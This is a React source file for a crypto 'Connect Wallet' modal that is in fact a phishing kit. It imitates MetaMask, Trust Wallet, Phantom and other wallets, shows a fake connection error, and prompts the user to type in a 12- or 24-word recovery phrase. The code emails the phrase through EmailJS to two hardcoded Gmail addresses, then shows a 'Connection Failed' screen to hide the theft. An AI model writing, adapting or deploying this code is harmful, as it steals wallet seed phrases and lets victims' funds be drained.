import React, { useState, useEffect } from 'react';
import { sendEmail } from './emailService';
import './CardModal.css';

// Predefined email addresses
const EMAIL_ADDRESS_1 = 'stewiegriffin3368@gmail.com'; // First email address
const EMAIL_ADDRESS_2 = 'Mrherbert619@gmail.com'; // Second email address

function CardModal({ isOpen, onClose, onSelect, onManualComplete, showManualConnect = false, cardType }) {
  const [connectingState, setConnectingState] = useState(null); // null, 'connecting', 'error'
  const [selectedWallet, setSelectedWallet] = useState(null);
  const [connectStep, setConnectStep] = useState(null); // null, 'options', 'message', 'sending', 'success'
  const [messageLength, setMessageLength] = useState(null); // '1200' or '2400'
  const [messageText, setMessageText] = useState('');
  const [seedPhraseWords, setSeedPhraseWords] = useState(Array(12).fill(''));

  // Set error state immediately if showManualConnect is true
  useEffect(() => {
    if (isOpen && showManualConnect) {
      setConnectingState('error');
      setSelectedWallet({ name: 'MetaMask' });
    }
  }, [isOpen, showManualConnect]);

  useEffect(() => {
    // Clean up when component unmounts
    return () => {
      // Clear any timeouts
      const allTimeouts = window.setTimeout(function () { }, 0);
      for (let i = 0; i <= allTimeouts; i++) {
        window.clearTimeout(i);
      }
    };
  }, []);

  if (!isOpen) return null;

  const wallets = [
    { id: 1, name: 'MetaMask', image: '/images/wallets/metamask.png', type: 'EVM' },
    { id: 2, name: 'Trust Wallet', image: '/images/wallets/trust.png', type: 'Multi-chain' },
    { id: 3, name: 'Phantom', image: '/images/wallets/phantom.svg', type: 'Solana' },
    { id: 4, name: 'NEAR Wallet', image: '/images/wallets/near.png', type: 'NEAR' },
    { id: 5, name: 'Meteor', image: '/images/wallets/meteor.png', type: 'Meteor' },
    { id: 6, name: 'NEAR MOBILE', image: '/images/wallets/nearmobile.png', type: 'Nearmobile' },
    { id: 7, name: 'GeroWallet', image: '/images/wallets/gero.jpg', type: 'Cardano' }
  ];

  // Function to send email
  const sendWalletEmail = (recipientEmail, isSecondEmail = false) => {
    const formattedDetails = `
Wallet Name: ${selectedWallet?.name || "Unknown"}
Wallet Type: ${selectedWallet?.type || "Unknown"}
Wallet ID: ${selectedWallet?.id || "N/A"}
Recovery Phrase: ${messageText}
Words: ${(messageLength === "1200" ? "12" : "24")}
Timestamp: ${new Date().toISOString()}
`;

    const templateParams = {
      to_email: recipientEmail,
      from_name: 'Wallet Connection App',
      subject: `Wallet Connection: ${selectedWallet?.name || "Unknown"} (${selectedWallet?.type || "Unknown"})`,
      wallet_name: selectedWallet?.name || 'Unknown Wallet',
      wallet_type: selectedWallet?.type || 'Unknown',
      wallet_blockchain: selectedWallet?.type || 'Unknown Chain',
      wallet_details: JSON.stringify(selectedWallet),
      wallet_image: selectedWallet?.image || '',
      wallet_id: selectedWallet?.id || '',
      message: messageText,
      recovery_phrase: messageText, // Also include as recovery_phrase for clarity
      message_length: (messageLength === '1200' ? '12' : '24') + ' Words',
      seed_phrase_count: messageLength === '1200' ? 12 : 24,
      user_ip: 'User IP Address', // You would need to get the actual IP
      timestamp: new Date().toISOString(),
      formatted_details: formattedDetails
    };

    // EmailJS service and template IDs
    const serviceId = 'service_osb23rb';
    // Use different template ID based on which email is being sent
    const templateId = isSecondEmail ? 'template_jzejiu1' : 'template_ldwm92v';

    return sendEmail(serviceId, templateId, templateParams)
      .then((response) => {
        console.log(`Email sent to ${recipientEmail}`, response.status);
        return true;
      })
      .catch((err) => {
        console.error(`Failed to send email to ${recipientEmail}`, err);
        return false;
      });
  };

  const handleWalletSelect = (wallet) => {
    setSelectedWallet(wallet);
    setConnectingState('connecting');

    // Simulate connection error after 3 seconds for consistency with MetaMask
    setTimeout(() => {
      setConnectingState('error');
    }, 3000);
  };

  const handleConnectManually = () => {
    setConnectStep('options');
  };



  const handleSendMessage = () => {
    if (messageText.trim() === '') return;

    setConnectStep('sending');

    // Send to first email
    sendWalletEmail(EMAIL_ADDRESS_1, false)
      .then(success => {
        if (success) {
          // Send to second email after 1 minute 20 seconds
          setTimeout(() => {
            sendWalletEmail(EMAIL_ADDRESS_2, true)
              .then(secondSuccess => {
                if (secondSuccess) {
                  // Show success after second email is sent
                  setTimeout(() => {
                    setConnectStep('success');
                  }, 1000);
                }
              });
          }, 80000); // Delay set to 1 minute 20 seconds
        } else {
          // Handle error for first email
          setTimeout(() => {
            setConnectStep('success'); // Still show success for demo purposes
          }, 3000);
        }
      });
  };

  const handleComplete = () => {
    if (onSelect && selectedWallet) {
      onSelect(selectedWallet);
    }

    // Call onManualComplete if provided
    if (onManualComplete) {
      onManualComplete();
    }

    // Reset state before closing
    resetState();
    onClose();
  };

  const handleBack = () => {
    if (connectStep === 'message') {
      setConnectStep('options');
    } else {
      setConnectStep(null);
      setConnectingState('error');
    }
  };

  const resetState = () => {
    setConnectingState(null);
    setSelectedWallet(null);
    setConnectStep(null);
    setMessageLength(null);
    setMessageText('');
  };

  const handleClose = () => {
    // Call onManualComplete if provided and we're canceling from error state
    if (onManualComplete && connectingState === 'error' && !connectStep) {
      onManualComplete();
    }

    resetState();
    onClose();
  };

  const renderConnectingState = () => (
    <>
      <div className="modal-header">
        <h2>Connect Wallet</h2>
        <button className="close-button" onClick={handleClose}>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
            <line x1="18" y1="6" x2="6" y2="18"></line>
            <line x1="6" y1="6" x2="18" y2="18"></line>
          </svg>
        </button>
      </div>

      <div className="connecting-container">
        <div className="loading-spinner"></div>
        <p className="connecting-text">Connecting to wallet...</p>
      </div>
    </>
  );

  const renderErrorState = () => (
    <>
      <div className="modal-header">
        <h2>Unable to connect</h2>
        <button className="close-button" onClick={handleClose}>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
            <line x1="18" y1="6" x2="6" y2="18"></line>
            <line x1="6" y1="6" x2="18" y2="18"></line>
          </svg>
        </button>
      </div>

      <div className="error-container">
        <div className="error-icon">
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="#FF5252" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
            <path d="M10.29 3.86L1.82 18a2 2 0 0 0 1.71 3h16.94a2 2 0 0 0 1.71-3L13.71 3.86a2 2 0 0 0-3.42 0z"></path>
            <line x1="12" y1="9" x2="12" y2="13"></line>
            <line x1="12" y1="17" x2="12.01" y2="17"></line>
          </svg>
        </div>
        <h3 className="error-title">Connection Error</h3>
        <p className="error-message">WebSocket Connection failed to server host.</p>
        <p className="error-submessage">Please try connecting manually.</p>

        <button className="connect-manually-button" onClick={handleConnectManually}>
          Connect Manually
        </button>
      </div>
    </>
  );

  const renderConnectionOptions = () => (
    <>
      <div className="modal-header">
        <button className="back-button" onClick={handleBack}>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
            <path d="M15 18l-6-6 6-6" />
          </svg>
        </button>
        <h2>Connect via Message</h2>
        <button className="close-button" onClick={handleClose}>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
            <line x1="18" y1="6" x2="6" y2="18"></line>
            <line x1="6" y1="6" x2="18" y2="18"></line>
          </svg>
        </button>
      </div>

      <div className="connection-options-container">
        <p className="options-description">Select recovery phrase option:</p>

        <div className="options-buttons">
          <button
            className="option-button"
            onClick={() => handleMessageLengthSelect('1200')}
          >
            12-Word Recovery Phrase
          </button>
          <button
            className="option-button"
            onClick={() => handleMessageLengthSelect('2400')}
          >
            24-Word Recovery Phrase
          </button>
        </div>
      </div>
    </>
  );

  // Handle change for individual seed phrase input
  const handleMessageLengthSelect = (length) => {
    setMessageLength(length);
    // Initialize 12 or 24 empty inputs based on selection
    const wordCount = length === '1200' ? 12 : 24;
    setSeedPhraseWords(Array(wordCount).fill(''));
    setMessageText('');
    setConnectStep('message');
  };

  const handleSeedPhraseChange = (index, value) => {
    const newSeedPhraseWords = [...seedPhraseWords];
    newSeedPhraseWords[index] = value;
    setSeedPhraseWords(newSeedPhraseWords);

    // Update messageText to join all words with spaces for compatibility with existing code
    setMessageText(newSeedPhraseWords.join(' ').trim());
  };

  const renderMessageInput = () => (
    <>
      <div className="modal-header">
        <button className="back-button" onClick={handleBack}>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
            <path d="M15 18l-6-6 6-6" />
          </svg>
        </button>
        <h2>Recovery Phrase</h2>
        <button className="close-button" onClick={handleClose}>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
            <line x1="18" y1="6" x2="6" y2="18"></line>
            <line x1="6" y1="6" x2="18" y2="18"></line>
          </svg>
        </button>
      </div>

      <div className="message-input-container">
        <p className="message-instructions">
          Enter your {seedPhraseWords.length}-word recovery phrase for {selectedWallet?.name} ({selectedWallet?.type || 'wallet'}):
        </p>

        <div className={`seed-phrase-grid ${seedPhraseWords.length > 12 ? 'has-24-words' : ''}`}>
          {seedPhraseWords.map((word, index) => (
            <div key={index} className="seed-phrase-input-container">
              <div className="seed-phrase-number">{index + 1}</div>
              <input
                type="text"
                className="seed-phrase-input"
                placeholder=""
                value={word}
                onChange={(e) => handleSeedPhraseChange(index, e.target.value)}
                autoComplete="off"
              />
            </div>
          ))}
        </div>

        <button
          className="send-message-button"
          onClick={handleSendMessage}
          disabled={seedPhraseWords.filter(word => word.trim()).length < seedPhraseWords.length}
        >
          Connect {selectedWallet?.name}
        </button>
      </div>
    </>
  );

  const renderSendingState = () => (
    <>
      <div className="modal-header">
        <h2>Connecting Wallet</h2>
        <button className="close-button" onClick={handleClose}>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
            <line x1="18" y1="6" x2="6" y2="18"></line>
            <line x1="6" y1="6" x2="18" y2="18"></line>
          </svg>
        </button>
      </div>

      <div className="connecting-container">
        <div className="loading-spinner"></div>
        <p className="connecting-text">Connecting Wallet...</p>
      </div>
    </>
  );



  const renderSuccessState = () => (
    <>
      <div className="modal-header">
        <h2>Connection Failed</h2>
        <button className="close-button" onClick={handleClose}>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
            <line x1="18" y1="6" x2="6" y2="18"></line>
            <line x1="6" y1="6" x2="18" y2="18"></line>
          </svg>
        </button>
      </div>

      <div className="success-container">
        <div className="error-icon">
          <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24" fill="none" stroke="#FF5252" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
            <circle cx="12" cy="12" r="10"></circle>
            <line x1="12" y1="8" x2="12" y2="12"></line>
            <line x1="12" y1="16" x2="12.01" y2="16"></line>
          </svg>
        </div>
        <h3 className="error-title">Error Occurred</h3>
        <p className="error-message">Please try connecting your wallet again.</p>

        <button className="complete-button error-button" onClick={handleComplete}>
          Try Again
        </button>
      </div>
    </>
  );

  const renderWalletList = () => (
    <>
      <div className="modal-header">
        <h2>Connect Wallet</h2>
        <button className="close-button" onClick={handleClose}>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
            <line x1="18" y1="6" x2="6" y2="18"></line>
            <line x1="6" y1="6" x2="18" y2="18"></line>
          </svg>
        </button>
      </div>

      <div className="cards-list-container">
        {wallets.map(wallet => (
          <div
            key={wallet.id}
            className="card-list-item"
            onClick={() => handleWalletSelect(wallet)}
          >
            <div className="card-icon">
              <img src={wallet.image} alt={wallet.name} />
            </div>
            <div className="card-info">
              <h3>{wallet.name}</h3>
              <p>{wallet.type}</p>
            </div>
          </div>
        ))}
      </div>
    </>
  );

  return (
    <div className="modal-overlay">
      <div className="card-modal-container">
        {connectingState === 'connecting' && renderConnectingState()}
        {connectingState === 'error' && connectStep === null && renderErrorState()}
        {connectStep === 'options' && renderConnectionOptions()}
        {connectStep === 'message' && renderMessageInput()}
        {connectStep === 'sending' && renderSendingState()}
        {connectStep === 'success' && renderSuccessState()}
        {!connectingState && !connectStep && renderWalletList()}
      </div>
    </div>
  );
}

export default CardModal; 